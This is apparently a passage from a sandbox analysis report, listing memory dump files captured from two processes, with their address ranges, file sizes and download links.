memory/2220-142-0x0000000071970000-0x000000007199E000-memory.dmp

Filesize
184KB

Download
memory/2220-45-0x0000000001F90000-0x0000000002064000-memory.dmp

Filesize
848KB

Download
memory/2220-5-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/2220-4-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/2220-34-0x0000000001F90000-0x0000000002064000-memory.dmp

Filesize
848KB

Download
memory/2220-35-0x0000000071970000-0x000000007199E000-memory.dmp

Filesize
184KB

Download
memory/2220-48-0x0000000071970000-0x000000007199E000-memory.dmp

Filesize
184KB

Download
memory/2220-46-0x0000000071970000-0x000000007199E000-memory.dmp

Filesize
184KB

Download
memory/2220-36-0x0000000001F90000-0x0000000002064000-memory.dmp

Filesize
848KB

Download
memory/2220-3-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/2220-38-0x0000000001F90000-0x0000000002064000-memory.dmp

Filesize
848KB

Download
memory/2220-40-0x0000000001F90000-0x0000000002064000-memory.dmp

Filesize
848KB

Download
memory/2220-39-0x0000000001F90000-0x0000000002064000-memory.dmp

Filesize
848KB

Download
memory/2220-37-0x0000000001F90000-0x0000000002064000-memory.dmp

Filesize
848KB

Download
memory/2220-30-0x0000000001F90000-0x0000000002064000-memory.dmp

Filesize
848KB

Download
memory/2220-14-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/2220-6-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/2220-7-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/2220-42-0x0000000001F90000-0x0000000002064000-memory.dmp

Filesize
848KB

Download
memory/2220-141-0x0000000001F90000-0x0000000002064000-memory.dmp

Filesize
848KB

Download
memory/2220-8-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2220-10-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/2768-55-0x00000000061D0000-0x00000000062A4000-memory.dmp

Filesize
848KB

Download
memory/2768-56-0x0000000002E70000-0x0000000004E70000-memory.dmp

Filesize
32.0MB

Download
memory/2768-53-0x00000000061D0000-0x00000000062A4000-memory.dmp

Filesize
848KB

Download